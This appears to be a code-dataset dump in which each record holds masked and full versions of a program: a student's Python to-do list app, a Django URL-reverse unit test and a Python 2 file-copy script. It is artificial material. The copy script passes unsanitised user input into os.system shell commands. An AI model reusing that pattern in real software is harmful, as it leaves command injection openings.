priority_to_check = check_priority_overlap(int(clean_input(
'New Priority:')), todo_list)
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
def sorting(list_object):
"""The purpose of this function is to take in a ListItem custom object
and return the priority value stored in it to be used in sorting.
:param list_object: one ListItem object
:returns the priority value stored in the ListItem object"""
return list_object.priority
<mask token>
def clean_input(prompt='Error'):
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try:
float(phrase)
text = False
except ValueError:
print('Error: Non-Numeric Entry Detected')
return float(phrase)
def load_from_file(save_location):
"""The purpose of this function is to open the .txt save file and read
the contents into memory in the form of a list of custom ListItem
objects.
:param save_location: the location the save file is stored in
:returns a list of ListItem objects that is populated with the data from
the save file"""
data_file_r = open(save_location, 'r')
list_item = ['Text', -1, 2, True]
todo = []
temp = 1
line_counter = 1
try:
for item in data_file_r:
if (line_counter - 1) % 5 != 0 and line_counter > 0:
cleaned_item = ''
for character_index in range(len(item)):
if character_index != len(item) - 1:
cleaned_item += item[character_index]
if temp == 1:
list_item[0] = cleaned_item
temp = 2
elif temp == 2:
list_item[1] = int(cleaned_item)
temp = 3
elif temp == 3:
list_item[2] = int(cleaned_item)
temp = 4
elif temp == 4:
if cleaned_item == 'False':
list_item[3] = False
else:
list_item[3] = True
todo.insert(0, ListItem(list_item[0], list_item[1],
list_item[2], list_item[3]))
temp = 1
else:
temp = 1
line_counter += 1
except ValueError:
print('An error has occurred trying to load the file')
result = int(clean_input(
'Please enter a 2 to overwrite the current save file and start over or any other number to exit the program'
))
if result == 2:
key = random.randint(2, 9)
if key == 2:
key = 1
result2 = int(clean_input(
"""Are you sure you want to delete all of your saved data
Enter {0} to proceed, or anything else to cancel"""
.format(str(key))))
if result2 == key:
data_file_w = open(save_location, 'w')
data_file_w.close()
todo = []
print('Save Data Erased')
return todo
else:
print('Program Exiting')
quit(1)
else:
print('Program Exiting')
quit(1)
data_file_r.close()
return todo
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location, 'w')
data_file_w.write(
"""Warning: The Todo-List Program will not be able to load this save file if it is incorrectly modified. Modify at your own risk. The structure is Entry Text, Entry Priority as a number, Entry Group as a number (Not Yet Utilized, but necessary), and Entry Visibility as a boolean, each on a separate line, a single line gap in between, and the very first line is skipped
"""
)
for item in todo_list:
data_file_w.write('{0}\n{1}\n{2}\n{3}\n\n'.format(item.text, str(
item.priority), str(item.group), str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input('Please enter the name of the new item\n')
priority = check_priority_overlap(int(clean_input(
'Please enter the priority of this item')), todo_list)
group = 0
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible))
return
def select_item(todo_list, prompt='Error'):
"""The purpose of this function is to display a list of all items in the
todo list and number each individually to allow the user to select an
item to modify or delete. The available numbers may
skip some if some items are hidden
:param todo_list: the list of ListItem objects to display
:param prompt: the prompt to display to the user, default is Error
:returns the user selected item's index in a computer friendly form (
starting at 0 instead of 1)"""
valid = False
index = 0
while not valid:
counter = 1
for item in todo_list:
if item.visible:
print(counter, item.text, sep='\t')
else:
print(counter, '~ {0} ~'.format(item.text), sep='\t')
counter += 1
index = int(clean_input(prompt))
if index < counter:
valid = True
else:
print('Invalid Input: Number is too big')
return index - 1
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to remove
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to Mark Completed and hide from the list
Enter a negative number or zero to cancel"""
)
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list,
"""Please enter the item number you wish to edit
Enter a negative number or zero to cancel"""
)
if item >= 0:
while True:
value = clean_input(
"""Which value would you like to edit? Enter:
1 for the Item Text (Currently: {0})
2 for the Item Priority (Currently: {1})
3 to Cancel and Exit"""
.format(todo_list[item].text, str(todo_list[item].priority)))
if value == 1:
print('The Current Text is: {0}'.format(todo_list[item].text))
todo_list[item].text = input('New Text:\n')
elif value == 2:
print('The Current Priority is: {0}'.format(str(todo_list[
item].priority)))
todo_list[item].priority = check_priority_overlap(int(
clean_input('New Priority:')), todo_list)
elif value == 3:
break
else:
print('Invalid Input - Please Try Again')
return
def check_list_status(todo_list):
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1
else:
state = 2
for item_index in range(len(todo_list)):
if todo_list[item_index].visible:
state = 0
return state
def menu_loop(todo_list, save_file_location):
"""The purpose of this function is to repeatedly display the todo list
and user prompts menu until the program is closed
:param todo_list: the list of ListItem objects to display or modify
:param save_file_location: where the .txt save file is located for saving
:returns nothing"""
show_hidden = False
selection = 0
invalid_input = False
while selection != 6:
if invalid_input:
invalid_input = False
else:
print_list(save_file_location, todo_list, True, show_hidden)
divider(137 + 17)
list_status = check_list_status(todo_list)
if list_status == 0:
selection = int(clean_input(
"""Please enter: 1 for Add Item, 2 for Remove Item, 3 for Edit Item, 4 for Mark Item Complete, 5 for Toggle Hidden, and 6 for Exit, 7 for Concept Demonstration
"""
))
elif list_status == 1:
selection = int(clean_input(
"""Please enter: 1 for Add Item, and 6 for Exit, 7 for Concept Demonstration
"""
))
else:
selection = int(clean_input(
"""Please enter: 1 for Add Item, 5 for Toggle Hidden, and 6 for Exit, 7 for Concept Demonstration
"""
))
print('')
if selection == 1:
add_item(todo_list)
elif selection == 2:
if list_status == 0:
remove_item(todo_list)
elif list_status == 2:
print(
'Invalid Command: The Todo List has no visible items to remove'
)
else:
print('Invalid Command: The Todo List has no items to remove')
elif selection == 3:
if list_status == 0:
edit_item(todo_list)
elif list_status == 2:
print(
'Invalid Command: The Todo List has no visible items to edit'
)
else:
print('Invalid Command: The Todo List has no items to edit')
elif selection == 4:
if list_status == 0:
mark_complete(todo_list)
elif list_status == 2:
print(
'Invalid Command: The Todo List has no visible items to mark complete'
)
else:
print(
'Invalid Command: The Todo List has no items to mark complete'
)
elif selection == 5:
if list_status == 0 or list_status == 2:
if show_hidden:
print('No longer showing hidden items')
show_hidden = False
else:
print('Now showing hidden items')
show_hidden = True
else:
print(
'Invalid Command: The Todo List has no items to show or hide'
)
elif selection == 6:
print('Now Closing')
elif selection == 7:
concept_demonstration()
else:
invalid_input = True
print('Invalid Input\nPlease Try Again')
def main():
"""The purpose of this function is to ensure the save file exists at the
specified save file location, load the save file into memory, display a
welcome message with a divider, then start the menu loop until the
program is closed
:returns nothing"""
save_file_location = 'Item_List.txt'
data_file_a = open(save_file_location, 'a')
data_file_a.close()
loaded_list = load_from_file(save_file_location)
print('Welcome to the To-Do List - Version: 0.1.2')
divider(42)
menu_loop(loaded_list, save_file_location)
<mask token>
| """This program displays a customizable list of items by priority value,
with priority 1 being the highest. Allows the user to add, edit,
mark complete, show completed (hidden), and remove items. Stores the list of
items in a .txt file located where this program's main.py file is. All
changes are automatically saved to the .txt file. Also includes a fun
technical knowledge demonstration using numbers and text responses. The
program will create a new save file if none exists, and prompts for save
file overwrite if data cannot be read successfully. Menu navigation is
accomplished through numeric inputs due to the text-only interface and
tedium of typing out each word accurately and repeatedly."""
__author__ = 'Jordan Kooyman'
# 1/26/21 - 4/15/2021 To-Do List Program - Integration Project for COP 1500
# Spring 2021
# Configurable settings saved to a separate file (?)
# Ability to load a different data or config file (?)
# Color code items by group (?)
# Add a basic calculator to meet math (and string?) command requirements (?)
# TODO: Implement a group system that shows all groups combined, just one
# group, or all categorized by group, and group names - be able to change
# group names (new function) - all functions support groups (individual or
# combined)
import random
# Random number generation used as random verification number when
# overwriting the save file in the event of a failure to load from the save
# file
class ListItem: # Create a class object that will store the data for each
# entry in the list (custom variable)
"""A custom object that stores four pieces of data representing each
entry in the todo list. Contains the text of the todo list entry,
the priority of the entry, the group code (NYI), and the visibility of
the entry"""
def __init__(self, text, priority, group, visible): # From w3schools.com
self.text = text
self.priority = priority
self.group = group
self.visible = visible
def concept_demonstration():
"""The purpose of this function is to prompt the user for numbers and
strings and manipulate them to demonstrate programming fluency with
string and integer operations.
:returns nothing"""
number = clean_input("Please enter a positive number")
number2 = clean_input("Please enter a number")
while number2 == 0: # Rejects a 0 if it is input as the second number
print("Error: Cannot Divide by 0")
number2 = clean_input("Please enter a different number")
color = input("Please enter a color\n")
thing = input("Please enter a thing\n")
thing2 = thing + ' ' # Adding space so that when thing is repeated, it
# has a space in between
# Raise the first number to the second number
location = input("Please enter a location\n")
print(str(number) + " raised to the power of " + str(number2) + " is " +
str(number ** number2))
# Multiply the two numbers
print("{0} multiplied by {1} is {2}".format(str(number), str(number2),
str(number * number2)))
# Divide the first number by the second number
print("{0} divided by {1} is {2}".format(str(number), str(number2),
str(number / number2)))
# Find the modulus of the two numbers
print("The remainder from dividing {0} by {1} is {2}".format(str(number),
str(number2),
str(number %
number2))
)
# Divide the first number by the second and round it down (floor it)
print("{0} divided by {1} rounded down is {2}".format(str(number),
str(number2),
str(number // number2
)))
# Add the two numbers
print("{0} plus {1} is {2}".format(str(number), str(number2),
str(number + number2)))
# Subtract the second number from the first number
print("{0} minus {1} is {2}".format(str(number), str(number2),
str(number - number2)))
if number > 1: # if the first number entered is greater than 1
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing2 *
int(number - 1) + thing))
# Combine two strings with + (no added space), repeat a string x
# number of times with * (must use an integer) (I have the minus 1
# and + thing to get the spacing to look proper and still repeat
# number amount of times) -if a negative number is used when
# multiplying a string, it does nothing (but does not crash) - but
# it is still handled in the other statement with some added user
# shaming
elif number < 0: # if the first number entered is negative
print("The {0} at {1} yelled '{2}'\nYou entered a negative number "
"when a positive number was requested, so you made the {3} "
"mute. Good Job.".format(color + ' ' + thing, location, thing2 *
int(number), thing))
# Same as above, except that it will print nothing in the yelled
# section if the first number entered is negative
else: # if the first number entered is 0 or 1 (because of the int()
# function removing a decimal)
print("The {0} at {1} yelled '{2}'".format(color + ' ' + thing,
location, thing *
int(number)))
# this is to prevent errant spaces or showing the phrase too many times
return
def cascade_list(priority_to_cascade_from, todo_list):
"""The purpose of this function is to decrement the priority number of
every item in the provided todo list greater than the priority number
provided.
:param priority_to_cascade_from: the number that is inserted by moving
everything equal to or greater than up by one
:param todo_list: the list of ListItem objects to check in"""
for item in todo_list:
if item.priority >= priority_to_cascade_from:
item.priority += 1
return
def check_priority_overlap(priority_to_check, todo_list):
"""The purpose of this function is to check if the user's priority
number input overlaps with a priority number already in the list,
and if it does, prompts the user whether they want to keep it, change
it, or move everything in the list that has a larger priority value up
by one.
:param priority_to_check: the number to check for overlap with
:param todo_list: the list of ListItem objects to check in
:returns the priority value, either changed or the original input"""
overlap = False
for item in todo_list:
if item.priority == priority_to_check:
overlap = True
if overlap:
answer = 0
while answer > 3 or answer < 1:
answer = clean_input("The priority number you entered overlaps "
"with another entry's priority. Enter:\n1 to "
"change priority number\n2 to leave as is "
"with overlap\n3 to push all priority numbers"
" below this entry down by 1")
if answer > 3 or answer < 1:
print("Invalid Option Selected\nPlease Try Again")
if answer == 1:
priority_to_check = check_priority_overlap(
int(clean_input("New Priority:")), todo_list)
# change the priority value input
elif answer == 3:
cascade_list(priority_to_check, todo_list)
return priority_to_check
def sorting(list_object): # Takes in a ListItem object and returns the
# priority value - from w3schools.com
"""The purpose of this function is to take in a ListItem custom object
and return the priority value stored in it to be used in sorting.
:param list_object: one ListItem object
:returns the priority value stored in the ListItem object"""
return list_object.priority
def print_list(save_file_location, my_list, to_save=False, show_hidden=False):
# Prints out the To-Do list from the common list variable and saves list
# to the .txt file
"""The purpose of this function is to take in the location of the save
file, the todo list variable, whether or not to save, and whether or not
to show hidden and print out the todo list variable, skipping items
marked as hidden unless it is told to show hidden, and saving the todo
list to the file in the save file location if it is told to save.
:param save_file_location: the file path to get to the .txt save file
:param my_list: the list of ListItem objects to check in
:param to_save: whether or not to save the list of items to the file,
default
is false
:param show_hidden: whether or not to display the hidden list items,
default
it false
:returns nothing"""
my_list.sort(key=sorting) # Uses a custom function to be able to get the
# right value to sort by
print("To-Do:")
for item_index in my_list: # Loop over every item in the list being
# printed
if item_index.visible and not show_hidden: # Only print visible items
# if show hidden is false
print(item_index.priority, item_index.text, sep='.\t')
elif show_hidden: # Print everything if show_hidden is true
if item_index.visible:
print(item_index.priority, item_index.text, sep='.\t')
else:
print("{0}.~\t{1}".format(item_index.priority, item_index.text)
)
# Indicate hidden items
# Printing the item priority with a dot, then the item, with a tab
# separating them
if to_save:
save_list(my_list, save_file_location)
return
def divider(size=100): # Draws a dividing line to go between sections
# (default 100 characters long)
"""The purpose of this function is to print a dashed line across the
screen with a specified length.
:param size: how many characters long the line should be, default is 100
:returns nothing"""
for i in range(size):
print('-', end='') # Prints out a single dash, no newline afterwards
# (the end= sets the last character to blank)
print('') # Print out a newline (using the default ending of a print
# statement being a newline)
return
def clean_input(prompt='Error'): # A special input function that will reject a
# user's input of text when a number is requested -- if no prompt is
# specified in the program, it will display "Error"
"""The purpose of this function is to prompt the user for a numerical
input and only accept a numerical input, rejects no input and text input.
:param prompt: the prompt the user sees, default is Error
:returns the user input as a float"""
text = True
phrase = '0'
while text:
phrase = input(prompt + '\n')
try: # Adapted from an example in the ThinkPython textbook (15.7) -
# Checks whether the input is a number, positive or negative. If
# not, rejects the input and user gets to try again
float(phrase)
text = False
except ValueError:
print("Error: Non-Numeric Entry Detected")
# if phrase.isnumeric(): # Checks for a positive number (negative
# rejected as well as text) - replaced with superior form from textbook
# example
# return float(phrase) # Return the number the user entered
# else:
# print("Error: Non-Numeric Entry Detected")
return float(phrase) # Return the number the user entered
def load_from_file(save_location): # This is a function for readability -
# opens txt file in read mode and loads it
"""The purpose of this function is to open the .txt save file and read
the contents into memory in the form of a list of custom ListItem
objects.
:param save_location: the location the save file is stored in
:returns a list of ListItem objects that is populated with the data from
the save file"""
# into an array (list) of ListItem variables
data_file_r = open(save_location, "r") # Open txt file in read mode
list_item = ["Text", -1, 2, True] # Item, Item Priority, group, is visible
todo = [] # make a list of lists
temp = 1 # Temporary counter variable to reconstruct lists from .txt file
line_counter = 1
try:
for item in data_file_r: # loop through each line in the file, one at
# a time - from w3schools.com
if (line_counter - 1) % 5 != 0 and line_counter > 0:
cleaned_item = ""
for character_index in range(len(
item)): # Loop through each character in the extracted
# string
if character_index != len(
item) - 1: # if it is not the last character, add
# it to the cleaned string
cleaned_item += item[character_index]
# Add every character except \n to the
# cleaned string
if temp == 1: # Item Text
list_item[0] = cleaned_item
temp = 2
elif temp == 2: # Item Priority
list_item[1] = int(cleaned_item)
temp = 3
elif temp == 3: # Item Group
list_item[2] = int(cleaned_item)
temp = 4
elif temp == 4: # Is Visible
if cleaned_item == "False":
list_item[3] = False
else: # Assume the item is visible if the text is not
# False
list_item[3] = True
todo.insert(0, ListItem(list_item[0], list_item[1],
list_item[2], list_item[3]))
temp = 1
else: # If some error occurred and a condition outside of the
# possible four is met, restart
temp = 1
line_counter += 1
except ValueError:
print("An error has occurred trying to load the file")
result = int(clean_input(
"Please enter a 2 to overwrite the current save file and start "
"over or any other number to exit the program"))
if result == 2:
key = random.randint(2, 9) # Generate a random integer between 2
# and 9 to be used as a second dynamic check
if key == 2:
key = 1 # If the random number is 2, set it to one so that
# the same number (2) cannot be used as the verification number
result2 = int(clean_input("Are you sure you want to delete all "
"of your saved data\nEnter {0} to "
"proceed, or anything else to "
"cancel".format(str(key))))
if result2 == key:
data_file_w = open("C:Item_List.txt", "w")
data_file_w.close()
todo = []
print("Save Data Erased")
return todo # Return an empty list if file load failed
else:
print("Program Exiting")
quit(1)
else:
print("Program Exiting")
quit(1) # Exit the program with the exit code of 1
data_file_r.close()
# All the list functions above referenced from w3schools.com What is
# happening above: Opening the file, initializing a list to hold all
# four pieces of data, then after pulling the data from the file and
# storing in the list, it is copied (not referenced) into my main list
# of ListItem objects
return todo
def save_list(todo_list, save_location):
"""The purpose of this function is to save a list of ListItem objects to a
specified location in a .txt file with the first line of the document
being an explanation of the file format being used.
:param todo_list: the list of ListItem objects to save to the save file
:param save_location: the location to create or overwrite the save file
:returns nothing"""
data_file_w = open(save_location,
"w") # open the save file and clear the data from it
data_file_w.write("Warning: The Todo-List Program will not be able to "
"load this save file if it is incorrectly modified. "
"Modify at your own risk. The structure is Entry "
"Text, Entry Priority as a number, Entry Group as a "
"number (Not Yet Utilized, but necessary), and Entry "
"Visibility as a boolean, each on a separate line, a "
"single line gap in between, and the "
"very first line is skipped\n")
for item in todo_list:
data_file_w.write("{0}\n{1}\n{2}\n{3}\n\n".format(item.text,
str(item.priority),
str(item.group),
str(item.visible)))
data_file_w.close()
return
def add_item(todo_list):
"""The purpose of this function is to prompt the user for the two
fields of necessary information to make a new entry in the todo list,
the item name and priority, checking if the priority overlaps with an
existing entry in the todo list.
:param todo_list: the list of ListItem objects to add a new ListItem
object to
:returns nothing"""
text = input("Please enter the name of the new item\n")
priority = check_priority_overlap(
int(clean_input("Please enter the priority of this item")), todo_list)
# group = int(clean_input("Please enter the group number of this item"))
group = 0 # Set the group value to zero, group system NYI
visible = True
todo_list.insert(0, ListItem(text, priority, group, visible)) # Join
# the inputs to be added to the overall list
return
def select_item(todo_list, prompt='Error'): # Ask the user
# which item from the list is to be modified
"""The purpose of this function is to display a list of all items in the
todo list and number each individually to allow the user to select an
item to modify or delete. The available numbers may
skip some if some items are hidden
:param todo_list: the list of ListItem objects to display
:param prompt: the prompt to display to the user, default is Error
:returns the user selected item's index in a computer friendly form (
starting at 0 instead of 1)"""
valid = False
index = 0
while not valid:
counter = 1 # counter for index printing
for item in todo_list: # Loop over every item in the list being
# printed
if item.visible:
print(counter, item.text, sep='\t')
else:
print(counter, "~ {0} ~".format(item.text), sep='\t')
counter += 1
# Printing the item number, then the item, with a tab separating
# them
index = int(clean_input(prompt))
if index < counter:
valid = True
else:
print("Invalid Input: Number is too big")
return index - 1
def remove_item(todo_list):
"""The purpose of this function is to delete a ListItem object from a
list of ListItem objects by prompting the user for the index and
verifying they want to delete the item.
:param todo_list: the list of ListItem objects from which to remove
one object
:returns nothing"""
item = select_item(todo_list, "Please enter the item number you wish to "
"remove\nEnter a negative number or zero "
"to cancel")
if item >= 0: # 0, not 1 because the index returned is shifted to be
# computer friendly
todo_list.pop(item)
return
def mark_complete(todo_list):
"""The purpose of this function is to mark a selectedListItem object as
hidden and not to be printed unless specified, apart from selecting items.
:param todo_list: the list of ListItem objects to modify
:returns nothing"""
item = select_item(todo_list, "Please enter the item number you wish to "
"Mark Completed and hide from the "
"list\nEnter a negative number or zero to "
"cancel")
if item >= 0:
todo_list[item].visible = False
return
def edit_item(todo_list):
"""The purpose of this function is to edit a ListItem object in the
list of ListItem objects, changing either the name or priority
:param todo_list: the list of ListItem objects that gets one object
modified
:returns nothing"""
item = select_item(todo_list, "Please enter the item number you wish to "
"edit\nEnter a negative number or zero to "
"cancel")
if item >= 0:
while True:
value = clean_input("Which value would you like to edit? Enter:\n1"
" for the Item Text (Currently: {0})\n2 for "
"the Item Priority (Currently: {1})\n3 to "
"Cancel and Exit".format(todo_list[item].text,
str(todo_list[item].
priority)))
if value == 1: # Item Text Change
print("The Current Text is: {0}".format(todo_list[item].text))
todo_list[item].text = input("New Text:\n")
elif value == 2: # Item Priority Change
print("The Current Priority is: {0}".format(str(todo_list[item]
.priority)))
todo_list[item].priority = check_priority_overlap(
int(clean_input("New Priority:")), todo_list)
# elif value == 3: # Item Group Change
# print(f"The Current Group is: {todo_list[item].group}")
# todo_list[item].group = int(clean_input("New Group Number:"))
elif value == 3: # Exit Changing Menu
break
else:
print("Invalid Input - Please Try Again")
return
def check_list_status(todo_list): # Checks if the list is completely hidden
# (2), completely empty (1), or neither (0)
"""The purpose of this function is to check whether there are visible
items in the list, the entire list is hidden, or the list contains no
more ListItem objects
:param todo_list: the list of ListItem objects to check
:returns which condition using integer codes"""
if len(todo_list) == 0:
state = 1 # Empty List
else:
state = 2 # Entirely Hidden List
for item_index in range(len(todo_list)):
if todo_list[item_index].visible: # If an item is visible, then
# they are not all hidden
state = 0 # Neither
return state
def menu_loop(todo_list, save_file_location):
"""The purpose of this function is to repeatedly display the todo list
and user prompts menu until the program is closed
:param todo_list: the list of ListItem objects to display or modify
:param save_file_location: where the .txt save file is located for saving
:returns nothing"""
show_hidden = False
selection = 0
invalid_input = False
while selection != 6:
if invalid_input:
invalid_input = False
else:
print_list(save_file_location, todo_list, True, show_hidden)
divider(137 + 17) # Length of prompt statement below
list_status = check_list_status(todo_list)
if list_status == 0: # No Issues
selection = int(clean_input("Please enter: 1 for Add Item, 2 for "
"Remove Item, 3 for Edit Item, "
"4 for Mark Item Complete, "
"5 for Toggle Hidden, and 6 for "
"Exit, 7 for Concept "
"Demonstration\n"))
elif list_status == 1: # Empty List - No Remove, Edit, Mark, or Toggle
selection = int(clean_input("Please enter: 1 for Add Item, and 6 "
"for Exit, 7 for Concept "
"Demonstration\n"))
else: # Entirely Hidden List
selection = int(clean_input("Please enter: 1 for Add Item, 5 for "
"Toggle Hidden, and 6 for Exit, "
"7 for Concept Demonstration\n"))
# Uses the clean_input function above to get a number from the
# user, converting it to an int so a decimal won't return an
# invalid input in the following steps
print("") # Blank Print statement to add an extra blank line after
# user input before displaying response
if selection == 1: # Add Item - modify the list variable, then save
# to file
add_item(todo_list)
elif selection == 2: # Remove Item - modify the list variable, then
# save to file
if list_status == 0:
remove_item(todo_list)
elif list_status == 2:
print("Invalid Command: The Todo List has no visible items "
"to remove")
else:
print("Invalid Command: The Todo List has no items to remove")
elif selection == 3: # Edit Item - modify the list variable, then save
# to file
if list_status == 0:
edit_item(todo_list)
elif list_status == 2:
print("Invalid Command: The Todo List has no visible items "
"to edit")
else:
print("Invalid Command: The Todo List has no items to edit")
elif selection == 4: # Mark Item Complete - modify the list variable,
# then save to file
if list_status == 0:
mark_complete(todo_list)
elif list_status == 2:
print("Invalid Command: The Todo List has no visible items "
"to mark complete")
else:
print("Invalid Command: The Todo List has no items to mark "
"complete")
elif selection == 5: # Show Hidden - modify the list variable, then
# save to file
if list_status == 0 or list_status == 2:
if show_hidden:
print("No longer showing hidden items")
show_hidden = False
else:
print("Now showing hidden items")
show_hidden = True
else:
print("Invalid Command: The Todo List has no items to show or "
"hide")
elif selection == 6: # Exit Program
print("Now Closing")
elif selection == 7: # Extra section to demonstrate proficiency with
# topics covered in class - Sprint 1
concept_demonstration()
else:
invalid_input = True
print("Invalid Input\nPlease Try Again")
def main():
"""The purpose of this function is to ensure the save file exists at the
specified save file location, load the save file into memory, display a
welcome message with a divider, then start the menu loop until the
program is closed
:returns nothing"""
save_file_location = "Item_List.txt"
data_file_a = open(save_file_location, "a") # Opens ItemList.txt which
# is accessible in the file variable, in append mode (using this so that
# if the file exists, nothing happens, but if it does not exist, it gets
# created from w3schools.com
data_file_a.close() # Close the file, I now know it exists
loaded_list = load_from_file(save_file_location)
print("Welcome to the To-Do List - Version: 0.1.2")
divider(42) # Length of welcome statement above
menu_loop(loaded_list, save_file_location)
if __name__ == "__main__":
main()
| [
8,
11,
12,
18,
24
] |
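As a standalone illustration of the save format the record above documents in its docstrings (one header line that the loader skips, then text, priority, group, and visibility on separate lines with a blank separator), here is a minimal Python 3 round-trip sketch; the entry values are made up:

from io import StringIO

entries = [("buy milk", 1, 0, True), ("old task", 2, 0, False)]

buf = StringIO()
buf.write("header line, skipped by the loader\n")
for text, priority, group, visible in entries:
    buf.write("{0}\n{1}\n{2}\n{3}\n\n".format(text, priority, group, visible))

lines = buf.getvalue().splitlines()
parsed = []
for i in range(1, len(lines), 5):  # 4 data lines + 1 blank line per entry
    text, priority, group, visible = lines[i:i + 4]
    parsed.append((text, int(priority), int(group), visible == "True"))

assert parsed == entries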
633 | b7ccb41c43a0db6f1bf9e6ba5cef1b9b1417e297 | "Unit tests for reverse URL lookup"
from django.core.urlresolvers import reverse_helper, NoReverseMatch
import re, unittest
test_data = (
('^places/(\d+)/$', 'places/3/', [3], {}),
('^places/(\d+)/$', 'places/3/', ['3'], {}),
('^places/(\d+)/$', NoReverseMatch, ['a'], {}),
('^places/(\d+)/$', NoReverseMatch, [], {}),
('^places/(?P<id>\d+)/$', 'places/3/', [], {'id': 3}),
('^people/(?P<name>\w+)/$', 'people/adrian/', ['adrian'], {}),
('^people/(?P<name>\w+)/$', 'people/adrian/', [], {'name': 'adrian'}),
('^people/(?P<name>\w+)/$', NoReverseMatch, ['name with spaces'], {}),
('^people/(?P<name>\w+)/$', NoReverseMatch, [], {'name': 'name with spaces'}),
('^people/(?P<name>\w+)/$', NoReverseMatch, [], {}),
('^hardcoded/$', 'hardcoded/', [], {}),
('^hardcoded/$', 'hardcoded/', ['any arg'], {}),
('^hardcoded/$', 'hardcoded/', [], {'kwarg': 'foo'}),
('^people/(?P<state>\w\w)/(?P<name>\w+)/$', 'people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('^people/(?P<state>\w\w)/(?P<name>\d)/$', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('^people/(?P<state>\w\w)/(?P<name>\w+)/$', NoReverseMatch, [], {'state': 'il'}),
('^people/(?P<state>\w\w)/(?P<name>\w+)/$', NoReverseMatch, [], {'name': 'adrian'}),
('^people/(?P<state>\w\w)/(\w+)/$', NoReverseMatch, ['il'], {'name': 'adrian'}),
('^people/(?P<state>\w\w)/(\w+)/$', 'people/il/adrian/', ['adrian'], {'state': 'il'}),
)
class URLPatternReverse(unittest.TestCase):
def test_urlpattern_reverse(self):
for regex, expected, args, kwargs in test_data:
try:
got = reverse_helper(re.compile(regex), *args, **kwargs)
except NoReverseMatch, e:
self.assertEqual(expected, NoReverseMatch)
else:
self.assertEquals(got, expected)
if __name__ == "__main__":
run_tests(1)
| null | null | null | null | [
0
] |
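For context on what these patterns exercise, a rough Python 3 approximation (naive_reverse and GROUP_RE are illustrative helpers, not Django's implementation): substitute args/kwargs back into the URL regex and reject any candidate the pattern no longer matches, which is what produces NoReverseMatch for inputs like 'name with spaces':

import re

GROUP_RE = re.compile(r'\(\?P<(\w+)>[^)]*\)|\([^)]*\)')

def naive_reverse(pattern, *args, **kwargs):
    args = list(args)
    def substitute(match):
        name = match.group(1)
        return str(kwargs[name]) if name else str(args.pop(0))
    candidate = GROUP_RE.sub(substitute, pattern).lstrip('^').rstrip('$')
    if not re.match(pattern, candidate):
        raise ValueError('no reverse match')
    return candidate

print(naive_reverse(r'^places/(\d+)/$', 3))                      # places/3/
print(naive_reverse(r'^people/(?P<name>\w+)/$', name='adrian'))  # people/adrian/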
634 | 778cf8064fa45e3e25a66f2165dcf6885c72fb8a | <mask token>
| <mask token>
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
<mask token>
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input('done!')
| <mask token>
org_GIS = raw_input(
'provide path to GIS folder in dropbox : eg. C:\\Dropbox\\Barcin_Hoyuk\\AIS_Barcin_Hoyuk\\AIS\\GIS\\: '
)
outputfolder = raw_input('provide path to output folder : eg. C:\\Temp\\: ')
ext = raw_input('provide extension type to be copied eg .tif or .jpg :')
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
file1 = open(org_GIS + 'tempext.txt', 'r')
lines = file1.readlines()
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input('done!')
| import shutil
import os
org_GIS = raw_input(
'provide path to GIS folder in dropbox : eg. C:\\Dropbox\\Barcin_Hoyuk\\AIS_Barcin_Hoyuk\\AIS\\GIS\\: '
)
outputfolder = raw_input('provide path to output folder : eg. C:\\Temp\\: ')
ext = raw_input('provide extension type to be copied eg .tif or .jpg :')
os.system('dir ' + org_GIS + '*' + ext + ' /s/d/b >' + org_GIS + 'tempext.txt')
file1 = open(org_GIS + 'tempext.txt', 'r')
lines = file1.readlines()
for line in lines:
ln = line.rstrip('\n')
shutil.copy(ln, outputfolder)
file1.close()
os.system('del ' + org_GIS + 'tempext.txt')
raw_input('done!')
| # This script allows you to copy all files with a certain extention to a new folder without integrating the sub folders
# Created by Maurice de Kleijn Vrije Universiteit Amsterdam Spatial Information laboratory for the datamanagement of the the archaological project Barin Hoyuk
# 22062016 Python 2.7
import shutil
import os
org_GIS = raw_input("provide path to GIS folder in dropbox : eg. C:\Dropbox\Barcin_Hoyuk\AIS_Barcin_Hoyuk\AIS\GIS\\: ")
outputfolder = raw_input("provide path to output folder : eg. C:\Temp\: ")
